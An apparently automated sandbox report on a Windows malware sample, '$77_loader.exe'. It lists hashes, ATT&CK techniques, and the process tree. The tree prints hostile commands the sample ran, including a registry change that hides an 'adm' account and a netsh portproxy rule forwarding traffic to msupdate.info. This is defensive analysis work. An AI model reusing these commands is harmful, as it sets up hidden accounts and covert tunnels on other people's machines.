3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4

General

Target

$77_loader.exe
Size

397KB
MD5

aff57ee1a4f3731c2036046910f78fb4
SHA1

ef9627c0cadff85a3dfaab6aef0b7c885f03b186
SHA256

3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4
SHA512

5ae93c6dae61782a7ac2fa2079df7006e0655d73e32fd7df1a5c1d44e47fd7dd2da225ea6f93e9d3dcb09be5f84b5dab2130bb4f2d5b0e05d95e866ebde0163f

Score

8^/10

evasion persistence

Malware Config

Signatures

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Modifies WinLogon 2 TTPs 3 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	$77_loader.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	$77_loader.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0"	$77_loader.exe

Modifies powershell logging option 1 TTPs
evasion

Modify Registry
T1112

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SoftwareDistribution\config.xml	$77_loader.exe
File opened for modification	C:\Windows\SoftwareDistribution\config.xml	$77_loader.exe

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
3204	NETSTAT.EXE
432	NETSTAT.EXE
4632	NETSTAT.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3328	$77_loader.exe
3328	$77_loader.exe
3328	$77_loader.exe
3328	$77_loader.exe
3328	$77_loader.exe
3328	$77_loader.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	3328	$77_loader.exe
Token: SeSecurityPrivilege	1896	msiexec.exe
Token: SeDebugPrivilege	3204	NETSTAT.EXE
Token: SeDebugPrivilege	432	NETSTAT.EXE
Token: SeDebugPrivilege	4632	NETSTAT.EXE

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 3328 wrote to memory of 4820	3328	$77_loader.exe	80
PID 3328 wrote to memory of 4820	3328	$77_loader.exe	80
PID 4820 wrote to memory of 4688	4820	csc.exe	82
PID 4820 wrote to memory of 4688	4820	csc.exe	82
PID 3328 wrote to memory of 4940	3328	$77_loader.exe	84
PID 3328 wrote to memory of 4940	3328	$77_loader.exe	84
PID 3328 wrote to memory of 2480	3328	$77_loader.exe	91
PID 3328 wrote to memory of 2480	3328	$77_loader.exe	91
PID 3328 wrote to memory of 3204	3328	$77_loader.exe	92
PID 3328 wrote to memory of 3204	3328	$77_loader.exe	92
PID 3328 wrote to memory of 432	3328	$77_loader.exe	93
PID 3328 wrote to memory of 432	3328	$77_loader.exe	93
PID 3328 wrote to memory of 4632	3328	$77_loader.exe	94
PID 3328 wrote to memory of 4632	3328	$77_loader.exe	94
PID 3328 wrote to memory of 1668	3328	$77_loader.exe	95
PID 3328 wrote to memory of 1668	3328	$77_loader.exe	95
PID 3328 wrote to memory of 3144	3328	$77_loader.exe	97
PID 3328 wrote to memory of 3144	3328	$77_loader.exe	97
PID 3328 wrote to memory of 3128	3328	$77_loader.exe	98
PID 3328 wrote to memory of 3128	3328	$77_loader.exe	98
PID 3328 wrote to memory of 4868	3328	$77_loader.exe	100
PID 3328 wrote to memory of 4868	3328	$77_loader.exe	100
PID 3328 wrote to memory of 2368	3328	$77_loader.exe	102
PID 3328 wrote to memory of 2368	3328	$77_loader.exe	102

C:\Users\Admin\AppData\Local\Temp\$77_loader.exe
"C:\Users\Admin\AppData\Local\Temp\$77_loader.exe"
1⤵
- Modifies WinLogon
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3328
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\7nxsnx8m.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4820
- - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES78DF.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC78CE.tmp"
    3⤵
    PID:4688
- C:\Windows\system32\chcp.com
  "C:\Windows\system32\chcp.com" 437
  2⤵
  PID:4940
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:2480
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:3204
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:432
- C:\Windows\system32\NETSTAT.EXE
  "C:\Windows\system32\NETSTAT.EXE" -na
  2⤵
  - Gathers network information
  - Suspicious use of AdjustPrivilegeToken
  PID:4632
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy reset
  2⤵
  PID:1668
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:3144
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
  2⤵
  PID:3128
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:4868
- C:\Windows\system32\netsh.exe
  "C:\Windows\system32\netsh.exe" interface portproxy show all
  2⤵
  PID:2368

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1896

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Registry Run Keys / Startup Folder

Winlogon Helper DLL

Privilege Escalation

Defense Evasion

Modify Registry

3

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7nxsnx8m.dll

Filesize
3KB

MD5
8d4ec709688a6185c8fae814de0005e5

SHA1
513f226c843cc8fbdcd24d8c66f4c22cf8a09d2f

SHA256
9535964dec8d14f6b0b0e722a80f41de2990fcbd7b5a1ca6e874a3740f4154f3

SHA512
11777177ea768c57a2f74814f9c22dc0d47168792fcd29382b8589f26d780743209dfaca254fc3d8a05a2a879d6cdaf43ff3adea186aa7d64b7cac3c7d85774a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7nxsnx8m.pdb

Filesize
11KB

MD5
2fc3b08a7fc80ea8ddff09577d070e8d

SHA1
6d4c1b9551c4de34b5129d45022b3097633f902e

SHA256
2dea6fa888d3b0ea6e5394f422dbdde7199e3b7e9ef28ae907b75fad11831062

SHA512
e707805fbdef62c0ce73c746904b020af9521b14d0fc723a10db050de24a82655b598a6b92cdbc154846a02b78e3257c52c2f0ffe490076a85f6f500ba455760

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES78DF.tmp

Filesize
1KB

MD5
28243d1a5e570f65058f8e23a67c0d41

SHA1
e229804acfc755d439eb8fb9412077fe371b5f3c

SHA256
d3a773e82cbc44a21cfbe8d2b1059ade0b4c3a1087d26d199fa842d2bc3f8826

SHA512
775ba00e67c07b60afdb2aa34e7072dd2fefe659cb0734c18c2dc0f8197f8784c2b2373b88e53a08f8eb187b48070dc9b45bc7aff2c53f562b0d7e219d511307

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\7nxsnx8m.0.cs

Filesize
447B

MD5
1640a04633fee0dfdc7e22c4f4063bf6

SHA1
3cb525c47b5dd37f8ee45b034c9452265fba5476

SHA256
55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0

SHA512
85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\7nxsnx8m.cmdline

Filesize
309B

MD5
c966dcb5594d5c11dc92994317b5d66a

SHA1
85e3f1c744d4424b7a9e4e7de6ec4fbcd942ddf8

SHA256
03fb38cf6dd91783ecfb202a53eb56eba04e3832b5232a2330e67e083ceb93d8

SHA512
f65d2915f2a4aa531b5d7772d0fbd18c1dbe0aeb64e2fdec1f9f6316b57ba78c77c16052fe1cc4cbe77139dc7893d9e8ce56e1b4ed780287957bfb662d5cd15b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC78CE.tmp

Filesize
652B

MD5
71e21134c5f622606604126ddab930ba

SHA1
f2ae14adfd11b894c0bd7b714ed7d7222f647e12

SHA256
74c8516527bb00b9fcaf2909364573bfa6cae45fda4335c98c12939daeb67d92

SHA512
2786312fbdbae6256996a996503f262ce1b33340af4bb8d81b64d89e907146ae71af6dbd0319580d7e80d353d823c6953b4109ee4273e3b40f336bf186e0c885

Download Submit
memory/3328-130-0x000000001BB40000-0x000000001C69D000-memory.dmp

Filesize
11.4MB

Download
memory/3328-149-0x0000000000B9A000-0x0000000000B9F000-memory.dmp

Filesize
20KB

Download

Analysis

Sharing